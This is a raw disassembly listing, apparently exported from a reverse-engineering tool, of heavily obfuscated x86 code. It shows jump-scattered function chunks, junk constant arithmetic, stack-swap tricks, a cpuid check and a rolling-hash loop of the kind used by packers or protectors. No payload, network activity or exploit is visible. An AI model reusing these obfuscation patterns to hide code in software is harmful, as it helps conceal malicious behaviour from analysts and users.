; START OF FUNCTION CHUNK FOR sub_4291EA
loc_42AAFF: ; CODE XREF: sub_42D59A+1C�j
add edi, ebp
add edi, 13FE99E2h
loc_42AB07: ; CODE XREF: _7hdaygc1:loc_428C54�j
mov [edi], eax
pop edi
jmp loc_42C37C
; END OF FUNCTION CHUNK FOR sub_4291EA
; =============== S U B R O U T I N E =======================================
sub_42AB0F proc near ; CODE XREF: sub_42AA47-4BF9�p
; _7hdaygc1:00428460�j
; FUNCTION CHUNK AT 004251F0 SIZE 0000001C BYTES
; FUNCTION CHUNK AT 0042F5C2 SIZE 00000005 BYTES
xchg ebx, [esp+0]
pop ebx
add eax, ebp
push esi
push 0B5F1F76Eh
pop esi
or esi, 0E0744569h
jmp loc_4251F0
sub_42AB0F endp
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_423DDB
loc_42AB27: ; CODE XREF: sub_423DDB+16�j
ja loc_42EED6
loc_42AB2D: ; CODE XREF: sub_423DDB+4�j
cmp dword ptr [ebp-8], 0A22F8A70h
jz loc_42B644
mov eax, [ebp-0Ch]
call sub_42B650
jmp loc_42B644
; END OF FUNCTION CHUNK FOR sub_423DDB
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_424680
loc_42AB47: ; CODE XREF: sub_424680+1250�j
; _7hdaygc1:loc_42EF8B�j
jg loc_4244B0
jmp loc_42725C
; END OF FUNCTION CHUNK FOR sub_424680
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_426A39
loc_42AB52: ; CODE XREF: sub_426A39:loc_423929�j
mov ebx, [eax]
add eax, 4
mov edi, [eax]
add eax, 4
push offset sub_424981
jmp loc_423067
; END OF FUNCTION CHUNK FOR sub_426A39
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_42AB66 proc near ; CODE XREF: sub_42409E:loc_4297BF�j
retn
sub_42AB66 endp
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42DBF7
loc_42AB67: ; CODE XREF: sub_42DBF7-473C�j
call sub_42AA07
loc_42AB6C: ; CODE XREF: sub_42DBF7+1E1E�j
mov eax, ds:dword_425144
mov [ebp+var_4], eax
mov eax, [ebp+var_4]
mov esp, ebp
pop ebp
jmp loc_42E296
; END OF FUNCTION CHUNK FOR sub_42DBF7
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_140. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
loc_42AB80: ; CODE XREF: _7hdaygc1:0042B091�j
cmp esi, edx
jmp loc_42B5D0
; ---------------------------------------------------------------------------
sub ecx, ebx
jmp loc_4289CC
; ---------------------------------------------------------------------------
loc_42AB8E: ; CODE XREF: _7hdaygc1:00425B10�j
add ebp, edx
add ebp, 4B29B222h
mov edx, ebp
mov edx, [edx]
jmp loc_4258B9
; =============== S U B R O U T I N E =======================================
sub_42AB9F proc near ; CODE XREF: _7hdaygc1:00424767�p
; _7hdaygc1:00428834�j
; FUNCTION CHUNK AT 004230FD SIZE 00000007 BYTES
; FUNCTION CHUNK AT 0042392E SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00429A9C SIZE 00000019 BYTES
; FUNCTION CHUNK AT 0042A873 SIZE 00000019 BYTES
xchg ecx, [esp+0]
pop ecx
xor [esi], ebx
add [esi], ecx
xor [esi], edx
push 33FFBBDh
jmp loc_42A873
sub_42AB9F endp ; sp-analysis failed
; ---------------------------------------------------------------------------
loc_42ABB3: ; CODE XREF: _7hdaygc1:loc_429BE2�j
jz loc_42A9D2
jmp loc_42FD55
; ---------------------------------------------------------------------------
loc_42ABBE: ; CODE XREF: _7hdaygc1:0042B5E2�j
jz loc_42ADDA
; START OF FUNCTION CHUNK FOR sub_424E42
loc_42ABC4: ; CODE XREF: sub_424E42-939�j
jmp loc_42C859
; END OF FUNCTION CHUNK FOR sub_424E42
; ---------------------------------------------------------------------------
xor esi, ebx
mov esi, ebp
jmp loc_428029
; ---------------------------------------------------------------------------
pushf
jmp loc_42C3E3
; ---------------------------------------------------------------------------
xor ebp, 0AFB72A4Ch
jmp loc_425BCB
; =============== S U B R O U T I N E =======================================
sub_42ABE3 proc near ; CODE XREF: _7hdaygc1:loc_426288�j
; sub_42911B-105�p
arg_0 = dword ptr 4
xchg edi, [esp+0]
pop edi
xchg edx, [esp-4+arg_0]
jmp loc_42F4FE
sub_42ABE3 endp ; sp-analysis failed
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_87. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42C443
loc_42ABF0: ; CODE XREF: sub_42C443-6005�j
jmp loc_42CD34
; END OF FUNCTION CHUNK FOR sub_42C443
; ---------------------------------------------------------------------------
loc_42ABF5: ; CODE XREF: _7hdaygc1:0042E7E1�j
or ebx, ebp
; =============== S U B R O U T I N E =======================================
sub_42ABF7 proc near ; CODE XREF: sub_42D757-137E�p
arg_0 = dword ptr 4
; FUNCTION CHUNK AT 00423DD0 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 00426F82 SIZE 0000000D BYTES
; FUNCTION CHUNK AT 00429176 SIZE 00000015 BYTES
; FUNCTION CHUNK AT 0042B47E SIZE 0000001A BYTES
; FUNCTION CHUNK AT 0042D278 SIZE 00000004 BYTES
; FUNCTION CHUNK AT 0042FB8A SIZE 00000014 BYTES
; FUNCTION CHUNK AT 0042FD9F SIZE 00000010 BYTES
xchg eax, [esp+0]
pop eax
cmp ds:dword_427CA0, 0
call sub_42BE7D
loc_42AC07: ; CODE XREF: sub_42F31E-1B2D�j
jmp loc_42FB8A
sub_42ABF7 endp ; sp-analysis failed
; ---------------------------------------------------------------------------
loc_42AC0C: ; CODE XREF: _7hdaygc1:0042916A�j
jnb loc_42683E
loc_42AC12: ; CODE XREF: _7hdaygc1:loc_42B8D3�j
mov edi, eax
mov eax, 80000001h
loc_42AC19: ; CODE XREF: _7hdaygc1:loc_423843�j
xor edx, edx
cpuid
jmp loc_42C8D1
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42DD73
loc_42AC22: ; CODE XREF: sub_42DD73:loc_42EBBE�j
jz loc_42D1FF
jbe loc_428F3D
adc ebx, edi
jmp loc_42AF36
; END OF FUNCTION CHUNK FOR sub_42DD73
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42BE63
loc_42AC35: ; CODE XREF: sub_42BE63:loc_42430E�j
push edi
push eax
pop edi
xchg edi, [esp+6Ch+var_6C]
call sub_428917
push esi
push 12CA5320h
pop esi
and esi, 0BE353EA5h
add esi, 0EE4281AEh
xchg esi, [esp+60h+var_60]
jmp loc_42B410
; END OF FUNCTION CHUNK FOR sub_42BE63
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_424F62
loc_42AC5B: ; CODE XREF: sub_424F62:loc_426769�j
; _7hdaygc1:loc_42C281�j
jz loc_42CF30
xchg ebp, eax
cmp esi, 0EAC41978h
jmp loc_42E7E6
; END OF FUNCTION CHUNK FOR sub_424F62
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42CFDA
loc_42AC6E: ; CODE XREF: sub_42CFDA:loc_424850�j
add edx, 8387AB56h
jnb loc_42FC1D
loc_42AC7A: ; CODE XREF: sub_42F68E+9�j
jmp loc_423AA9
; END OF FUNCTION CHUNK FOR sub_42CFDA
; ---------------------------------------------------------------------------
add eax, 1FE9CCEEh
jge loc_42DE05
and ebx, ebp
mov ebp, esi
jmp loc_42EEF1
; ---------------------------------------------------------------------------
sub ebp, 75DEB257h
ror ebp, 1Dh
jmp sub_42C6FB
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42948A
loc_42ACA2: ; CODE XREF: sub_42948A+3F98�j
xor esi, ebp
loc_42ACA4: ; CODE XREF: sub_42948A:loc_4266D7�j
push 4A4C6331h
pop edx
and edx, 16F5E810h
or edx, 0AEB9E535h
sub edx, ds:4000F7h
and edx, 0E6E3DBEh
add edx, 0F9809970h
jmp loc_4271B5
; END OF FUNCTION CHUNK FOR sub_42948A
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42BB83
loc_42ACCD: ; CODE XREF: sub_42BB83:loc_42E051�j
test al, al
jz loc_42465E
jmp loc_423FB3
; END OF FUNCTION CHUNK FOR sub_42BB83
; ---------------------------------------------------------------------------
xor ebp, ebx
jmp sub_428917
; ---------------------------------------------------------------------------
mov ebp, [eax]
jmp loc_429316
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_427D11
loc_42ACE8: ; CODE XREF: sub_427D11:loc_423D6A�j
jz loc_4239E6
jmp loc_42484B
; END OF FUNCTION CHUNK FOR sub_427D11
; ---------------------------------------------------------------------------
loc_42ACF3: ; CODE XREF: _7hdaygc1:004235CF�j
cdq
loc_42ACF4: ; CODE XREF: _7hdaygc1:loc_42FDBC�j
push 36BC667Eh
pop eax
sub eax, 0F2683B92h
cmp eax, 24DDD9ACh
jmp loc_429DE1
; ---------------------------------------------------------------------------
loc_42AD0B: ; CODE XREF: _7hdaygc1:0042EF6C�j
test ecx, 3D9569D0h
jmp loc_42FCCD
; =============== S U B R O U T I N E =======================================
sub_42AD16 proc near ; CODE XREF: _7hdaygc1:0042A9CB�j
; sub_42BE7D+2A44�p
; FUNCTION CHUNK AT 00428298 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 004299A3 SIZE 00000012 BYTES
; FUNCTION CHUNK AT 0042BDA8 SIZE 00000026 BYTES
; FUNCTION CHUNK AT 0042F745 SIZE 00000005 BYTES
xchg ecx, [esp+0]
pop ecx
mov [ebp-0Ch], eax
mov eax, [ebp-0Ch]
add [ebp-8], eax
mov eax, [ebp-8]
jmp loc_42BDA8
sub_42AD16 endp ; sp-analysis failed
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4287D8
loc_42AD2B: ; CODE XREF: sub_4287D8:loc_4271CD�j
add ecx, 0B145D6B1h
xchg ecx, [esp+8+var_8]
jmp sub_42E29B
; END OF FUNCTION CHUNK FOR sub_4287D8
; ---------------------------------------------------------------------------
loc_42AD39: ; CODE XREF: _7hdaygc1:00423F2E�j
adc edx, 0E93C2EA1h
cmp eax, esi
jmp loc_42A5F6
; ---------------------------------------------------------------------------
loc_42AD46: ; CODE XREF: _7hdaygc1:0042EEB9�j
and edi, 0D87E395h
; START OF FUNCTION CHUNK FOR sub_42CDF7
loc_42AD4C: ; CODE XREF: sub_42CDF7:loc_42EEAC�j
xor edx, 148E06C4h
add edx, ebp
call sub_423DAE
loc_42AD59: ; CODE XREF: sub_42FD11-B03C�j
jl loc_4240E3
loc_42AD5F: ; CODE XREF: _7hdaygc1:0042639D�j
jmp nullsub_101
; END OF FUNCTION CHUNK FOR sub_42CDF7
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_423DFC
loc_42AD64: ; CODE XREF: sub_423DFC+2574�j
jmp loc_42E5FE
; END OF FUNCTION CHUNK FOR sub_423DFC
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42567E
loc_42AD69: ; CODE XREF: sub_42567E+3�j
jmp loc_4248CF
; END OF FUNCTION CHUNK FOR sub_42567E
; ---------------------------------------------------------------------------
mov eax, ebx
xor esi, ecx
jmp loc_4240E3
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_425A37
loc_42AD77: ; CODE XREF: sub_425A37+82F�j
xchg edi, [esp+10h+var_10]
mov esi, edi
pop edi
xor eax, 200000h
push edi
mov edi, eax
xchg edi, [esp+10h+var_10]
jmp loc_42C21F
; END OF FUNCTION CHUNK FOR sub_425A37
; ---------------------------------------------------------------------------
locret_42AD8D: ; CODE XREF: _7hdaygc1:00423686�j
retn
; ---------------------------------------------------------------------------
loc_42AD8E: ; CODE XREF: _7hdaygc1:00425897�j
not ebx
; =============== S U B R O U T I N E =======================================
sub_42AD90 proc near ; CODE XREF: sub_424680:loc_428BA9�p
xchg ebx, [esp+0]
pop ebx
mov eax, [ebp-8]
mov esp, ebp
pop ebp
retn
sub_42AD90 endp ; sp-analysis failed
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42809F
loc_42AD9B: ; CODE XREF: sub_42809F+7�j
jmp loc_4235DD
; END OF FUNCTION CHUNK FOR sub_42809F
; ---------------------------------------------------------------------------
loc_42ADA0: ; DATA XREF: sub_426B1A:loc_42E3D0�o
mov eax, [eax]
jmp loc_42AA65
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_426B1A
loc_42ADA7: ; CODE XREF: _7hdaygc1:loc_425DD9�j
; _7hdaygc1:00425DE2�j ...
xor ebx, ebx
loc_42ADA9: ; CODE XREF: sub_425339-1064�j
; sub_4269BB+2A3B�j
mov eax, ebx
push offset loc_42E1DA
jmp nullsub_34
; END OF FUNCTION CHUNK FOR sub_426B1A
; ---------------------------------------------------------------------------
add eax, 0E5FCD230h
jmp loc_4263AA
; ---------------------------------------------------------------------------
mov edx, ds:dword_42BC58
mov edx, [edx]
push offset sub_42EFF5
jmp locret_42B348
; ---------------------------------------------------------------------------
loc_42ADD2: ; CODE XREF: _7hdaygc1:00428031�j
jnp loc_428880
xchg edi, esi
loc_42ADDA: ; CODE XREF: _7hdaygc1:loc_42ABBE�j
add edi, 32B5E2h
push offset sub_42C92A
jmp loc_42B607
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42AFFE
loc_42ADEA: ; CODE XREF: sub_42AFFE-6402�j
jnz loc_427DC0
adc ebp, 9E0602A0h
jmp loc_42FA28
; END OF FUNCTION CHUNK FOR sub_42AFFE
; ---------------------------------------------------------------------------
loc_42ADFB: ; CODE XREF: _7hdaygc1:00426EA1�j
shl esi, 5
; =============== S U B R O U T I N E =======================================
sub_42ADFE proc near ; CODE XREF: sub_42616B:loc_424053�p
; FUNCTION CHUNK AT 00423B0D SIZE 00000006 BYTES
xchg edx, [esp+0]
pop edx
rol eax, 10h
push ebp
jmp loc_423B0D
sub_42ADFE endp
; =============== S U B R O U T I N E =======================================
sub_42AE0B proc near ; CODE XREF: _7hdaygc1:00428551�j
; sub_42E283-38C5�p
arg_0 = dword ptr 4
; FUNCTION CHUNK AT 00428956 SIZE 00000005 BYTES
xchg ebx, [esp+0]
pop ebx
add edx, 797137E7h
xchg edx, [esp-4+arg_0]
jmp loc_428956
sub_42AE0B endp ; sp-analysis failed
; ---------------------------------------------------------------------------
loc_42AE1D: ; CODE XREF: _7hdaygc1:loc_42CA19�j
or eax, 2CFB81E7h
call sub_42E205
loc_42AE28: ; CODE XREF: _7hdaygc1:00426519�j
call sub_42A94C
push 4674B576h
pop edx
and edx, 9DB3D884h
sub edx, 12D27CE7h
add edx, 2795637h
jmp loc_42C86F
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_424CE0
loc_42AE4A: ; CODE XREF: sub_424CE0+5A54�j
pop ecx
xor ecx, ds:4000FAh
add ecx, 3961FDB9h
and ecx, 0DE07926Ah
jnz loc_42EDD7
loc_42AE63: ; CODE XREF: sub_429EBB+45DF�j
jmp loc_426F9F
; END OF FUNCTION CHUNK FOR sub_424CE0
; ---------------------------------------------------------------------------
loc_42AE68: ; CODE XREF: _7hdaygc1:00428C8B�j
jmp loc_424025
; ---------------------------------------------------------------------------
locret_42AE6D: ; CODE XREF: _7hdaygc1:loc_4291C9�j
retn
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_196. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
loc_42AE6F: ; CODE XREF: _7hdaygc1:0042ED8E�j
jmp loc_42710A
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_425492
loc_42AE74: ; CODE XREF: sub_425492+4A24�j
jmp nullsub_35
; END OF FUNCTION CHUNK FOR sub_425492
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_424CE0
loc_42AE79: ; CODE XREF: sub_424CE0+375�j
jmp nullsub_98
; END OF FUNCTION CHUNK FOR sub_424CE0
; ---------------------------------------------------------------------------
loc_42AE7E: ; DATA XREF: sub_425A37+72BD�o
xchg edi, [esp]
mov esp, ebp
push offset sub_424755
jmp loc_42997C
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4270E6
loc_42AE8D: ; CODE XREF: sub_4270E6+1A�j
mov edx, eax
xchg edx, [esp+0]
call sub_42B32F
jmp loc_428088
; END OF FUNCTION CHUNK FOR sub_4270E6
; =============== S U B R O U T I N E =======================================
sub_42AE9C proc near ; CODE XREF: sub_4270E6+4�p
var_4 = dword ptr -4
; FUNCTION CHUNK AT 0042B716 SIZE 0000000A BYTES
; FUNCTION CHUNK AT 0042FB79 SIZE 00000005 BYTES
push edx
mov edx, ebp
xchg edx, [esp+4+var_4]
jmp loc_42B716
sub_42AE9C endp
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4253A0
loc_42AEA7: ; CODE XREF: sub_4253A0:loc_42D22D�j
mov edi, ebp
pop ebp
xor edi, 0FBA0BDAFh
test edi, 100000h
jmp loc_428F3D
; END OF FUNCTION CHUNK FOR sub_4253A0
; ---------------------------------------------------------------------------
mov ecx, edx
jmp loc_42612A
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_68. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_424F62
loc_42AEC3: ; CODE XREF: sub_424F62+2066�j
; _7hdaygc1:00428316�j
jge loc_42618B
loc_42AEC9: ; CODE XREF: sub_42D980+D�j
jmp loc_42876F
; END OF FUNCTION CHUNK FOR sub_424F62
; ---------------------------------------------------------------------------
jnz loc_4252A9
sub edx, ebx
add ebp, 0A081CF38h
jmp loc_429F8C
; ---------------------------------------------------------------------------
loc_42AEE1: ; CODE XREF: _7hdaygc1:0042BA36�j
rol edx, 19h
; =============== S U B R O U T I N E =======================================
sub_42AEE4 proc near ; CODE XREF: _7hdaygc1:004263D2�p
xchg edi, [esp+0]
pop edi
mov eax, [ebp-4]
mov esp, ebp
pop ebp
retn
sub_42AEE4 endp ; sp-analysis failed
; ---------------------------------------------------------------------------
loc_42AEEF: ; CODE XREF: _7hdaygc1:0042669C�j
jmp loc_426881
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_80. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_424F62
loc_42AEF5: ; CODE XREF: sub_424F62+5�j
add dword ptr [esi], 0F80586h
push 2CA580EFh
pop eax
or eax, 6C6DE893h
add eax, 0AE8BDD31h
sub eax, 992B5FE4h
test eax, 20h
jmp loc_426769
; END OF FUNCTION CHUNK FOR sub_424F62
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42AA47
loc_42AF1E: ; CODE XREF: sub_42AA47+2BDA�j
mov edi, ebp
mov ecx, 0A50F9A63h
adc esi, 97DA955h
loc_42AF2B: ; CODE XREF: sub_42AA47:loc_4238F6�j
; sub_425E64+78D5�j ...
jnz loc_425E36
jmp loc_42F5AC
; END OF FUNCTION CHUNK FOR sub_42AA47
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42DD73
loc_42AF36: ; CODE XREF: sub_42DD73-3143�j
shr ebx, 3
test esi, ebp
jmp loc_42D1F9
; END OF FUNCTION CHUNK FOR sub_42DD73
; ---------------------------------------------------------------------------
loc_42AF40: ; CODE XREF: _7hdaygc1:0042E10A�j
jbe loc_423D49
popf
add ecx, 4AC8EB91h
jmp loc_42C57B
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_424AA8
loc_42AF52: ; CODE XREF: sub_424AA8:loc_42C219�j
; _7hdaygc1:0042C240�j
or eax, 0D4FB8B07h
xor eax, 58EB8A7Bh
add eax, 592E87B0h
mov eax, [eax]
or eax, eax
jnz loc_42C9D0
jmp loc_4282C0
; END OF FUNCTION CHUNK FOR sub_424AA8
; ---------------------------------------------------------------------------
loc_42AF73: ; DATA XREF: sub_428802:loc_423D30�o
add edi, 2FC0044Ah
mov edi, [edi]
cmp eax, edi
pop edi
jmp loc_429894
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42A17C
loc_42AF83: ; CODE XREF: sub_42A17C+554C�j
xor eax, ebp
loc_42AF85: ; CODE XREF: sub_42A17C:loc_42ED93�j
call sub_42D757
mov edx, 0F2B89A19h
push ebx
push 12FDCEB4h
jmp loc_42C1D8
; END OF FUNCTION CHUNK FOR sub_42A17C
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_423172
loc_42AF9A: ; CODE XREF: sub_423172+8CB2�j
push ecx
push 42E6DD4Dh
pop ecx
xor ecx, ds:4000F8h
jmp loc_428571
; END OF FUNCTION CHUNK FOR sub_423172
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42926C
loc_42AFAC: ; CODE XREF: sub_42926C+12�j
pop eax
call sub_425D85
; END OF FUNCTION CHUNK FOR sub_42926C
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_120. PRESS KEYPAD "+" TO EXPAND]
; =============== S U B R O U T I N E =======================================
sub_42AFB3 proc near ; CODE XREF: sub_425BFC:loc_42C543�p
arg_4 = dword ptr 8
; FUNCTION CHUNK AT 00423CF7 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 004243F7 SIZE 00000013 BYTES
; FUNCTION CHUNK AT 004266EE SIZE 0000000A BYTES
push ebx
push ecx
call sub_425735
jmp loc_4243F7
sub_42AFB3 endp ; sp-analysis failed
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_429318
loc_42AFBF: ; CODE XREF: sub_429318:loc_42A4A4�j
; sub_429318+2D73�j
mov edx, [ebp-4]
lea eax, [ebp-0Ch]
mov ecx, [ebp-30h]
push offset loc_425B35
jmp nullsub_111
; END OF FUNCTION CHUNK FOR sub_429318
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42EF30
loc_42AFD2: ; CODE XREF: sub_42EF30-68B6�j
xor edx, ecx
rol edx, 5
add edx, eax
rol edx, 5
xor edx, esi
rol edx, 5
push offset loc_4286A2
jmp nullsub_122
; END OF FUNCTION CHUNK FOR sub_42EF30
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_424755
loc_42AFEB: ; CODE XREF: sub_424755+B�j
mov eax, ds:dword_42E1C4
or eax, eax
jnz loc_42D216
jmp loc_42DEB9
; END OF FUNCTION CHUNK FOR sub_424755
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_42AFFE proc near ; DATA XREF: sub_423CAC+A�o
var_30 = dword ptr -30h
var_14 = byte ptr -14h
var_8 = dword ptr -8
var_4 = dword ptr -4
; FUNCTION CHUNK AT 004236F4 SIZE 00000010 BYTES
; FUNCTION CHUNK AT 004239E6 SIZE 00000011 BYTES
; FUNCTION CHUNK AT 004241B8 SIZE 00000015 BYTES
; FUNCTION CHUNK AT 0042436E SIZE 00000016 BYTES
; FUNCTION CHUNK AT 00424834 SIZE 0000001C BYTES
; FUNCTION CHUNK AT 00424BED SIZE 00000014 BYTES
; FUNCTION CHUNK AT 00425125 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 004255CC SIZE 00000008 BYTES
; FUNCTION CHUNK AT 00426E91 SIZE 0000000A BYTES
; FUNCTION CHUNK AT 00427C98 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00427DC0 SIZE 0000001A BYTES
; FUNCTION CHUNK AT 004280CF SIZE 00000007 BYTES
; FUNCTION CHUNK AT 004281BA SIZE 00000005 BYTES
; FUNCTION CHUNK AT 004292C1 SIZE 00000023 BYTES
; FUNCTION CHUNK AT 004292FB SIZE 0000001B BYTES
; FUNCTION CHUNK AT 004297AD SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00429994 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0042A043 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0042A8E6 SIZE 00000015 BYTES
; FUNCTION CHUNK AT 0042ADEA SIZE 00000011 BYTES
; FUNCTION CHUNK AT 0042B597 SIZE 00000026 BYTES
; FUNCTION CHUNK AT 0042B602 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0042BC12 SIZE 00000016 BYTES
; FUNCTION CHUNK AT 0042D4F8 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 0042D563 SIZE 00000022 BYTES
; FUNCTION CHUNK AT 0042DC75 SIZE 00000017 BYTES
; FUNCTION CHUNK AT 0042E7C1 SIZE 0000001A BYTES
; FUNCTION CHUNK AT 0042EB9B SIZE 00000013 BYTES
; FUNCTION CHUNK AT 0042F01E SIZE 0000001E BYTES
; FUNCTION CHUNK AT 0042FA28 SIZE 00000015 BYTES
push ebp
mov ebp, esp
push ecx
cmp ds:dword_42515C, 0
jnz loc_427227
call nullsub_3
call sub_42D757
jmp loc_4297AD
sub_42AFFE endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
sub_42B01E proc near ; DATA XREF: sub_42A3F7�o
jnz sub_42D8CD
push ebp
call sub_425D65
push offset sub_423A6D
jmp nullsub_36
sub_42B01E endp
; =============== S U B R O U T I N E =======================================
sub_42B034 proc near ; DATA XREF: _7hdaygc1:0042B8E8�o
; FUNCTION CHUNK AT 00423785 SIZE 00000012 BYTES
; FUNCTION CHUNK AT 00424DAE SIZE 00000005 BYTES
push 0C33518E2h
pop ecx
add ecx, 0AF3CB66Bh
sub ecx, 868F0BD5h
and ecx, 40A589B8h
add ecx, 12DB1AAh
jmp loc_424DAE
sub_42B034 endp
; =============== S U B R O U T I N E =======================================
sub_42B057 proc near ; CODE XREF: _7hdaygc1:loc_428684�j
; sub_42F789-217F�p
; FUNCTION CHUNK AT 00425811 SIZE 00000005 BYTES
xchg ecx, [esp+0]
pop ecx
dec dword ptr [ebp-0Ch]
cmp dword ptr [ebp-0Ch], 0
jg loc_42F793
loc_42B068: ; CODE XREF: sub_4254BE:loc_42811B�j
; _7hdaygc1:0042CC3A�j ...
mov esp, ebp
pop ebp
jmp loc_425811
sub_42B057 endp ; sp-analysis failed
; ---------------------------------------------------------------------------
add ebx, ebp
jnz loc_429D7D
jmp sub_42DC52
; ---------------------------------------------------------------------------
loc_42B07D: ; CODE XREF: _7hdaygc1:0042D414�j
jnz loc_42B5D6
add ebx, ebp
loc_42B085: ; CODE XREF: _7hdaygc1:0042A157�j
jnp loc_42EF98
jz loc_4295DA
jmp loc_42AB80
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42911B
loc_42B096: ; CODE XREF: sub_42911B+11A2�j
jge loc_42373B
; END OF FUNCTION CHUNK FOR sub_42911B
; START OF FUNCTION CHUNK FOR sub_423648
loc_42B09C: ; CODE XREF: sub_423648+2188�j
jmp loc_42D112
; END OF FUNCTION CHUNK FOR sub_423648
; ---------------------------------------------------------------------------
and edx, 52231EC6h
jmp loc_423739
; ---------------------------------------------------------------------------
loc_42B0AC: ; CODE XREF: _7hdaygc1:004267A4�j
and edi, 5A65AF5h
sub edi, 805809A8h
add edi, 7AF48891h
xchg edi, [esp]
jmp sub_42D9E1
; ---------------------------------------------------------------------------
loc_42B0C6: ; CODE XREF: _7hdaygc1:00424B24�j
js loc_42949A
; =============== S U B R O U T I N E =======================================
sub_42B0CC proc near ; CODE XREF: sub_42C48C-6BDD�p
xchg eax, [esp+0]
pop eax
pop ecx
pop ecx
pop ebp
retn
sub_42B0CC endp ; sp-analysis failed
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42C48C
loc_42B0D4: ; CODE XREF: sub_42C48C-6BE9�j
mov eax, [ebp+8]
jmp loc_42A4F8
; END OF FUNCTION CHUNK FOR sub_42C48C
; =============== S U B R O U T I N E =======================================
sub_42B0DC proc near ; CODE XREF: _7hdaygc1:0042BFD6�j
; sub_42C50D:loc_42F5A2�p
var_4 = dword ptr -4
; FUNCTION CHUNK AT 004254FF SIZE 00000015 BYTES
xchg eax, [esp+4+var_4]
pop eax
push ebp
mov ebp, esp
push ecx
mov esp, ebp
xchg ecx, [esp+4+var_4]
mov ebp, ecx
jmp loc_4254FF
sub_42B0DC endp ; sp-analysis failed
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_423CCC
loc_42B0F0: ; CODE XREF: sub_423CCC:loc_42BC41�j
and esi, ds:4000F5h
add esi, 0F8D8FEE3h
and ebx, esi
xchg edx, [esp+4+var_4]
jmp loc_42816F
; END OF FUNCTION CHUNK FOR sub_423CCC
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_16. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4241F3
loc_42B107: ; CODE XREF: sub_4241F3+7592�j
jmp sub_42C1AF
; END OF FUNCTION CHUNK FOR sub_4241F3
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_426B1A
loc_42B10C: ; CODE XREF: sub_426B1A+13�j
jmp loc_42E3D0
; END OF FUNCTION CHUNK FOR sub_426B1A
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_423F02
loc_42B111: ; CODE XREF: sub_423F02+E�j
jmp loc_423139
; END OF FUNCTION CHUNK FOR sub_423F02
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42FCD3
loc_42B116: ; CODE XREF: sub_42FCD3:loc_42FCE2�j
and ecx, ds:4000F3h
or ecx, ds:4000F8h
cmp ecx, 0C2DACEDCh
jmp loc_42B7CD
; END OF FUNCTION CHUNK FOR sub_42FCD3
; ---------------------------------------------------------------------------
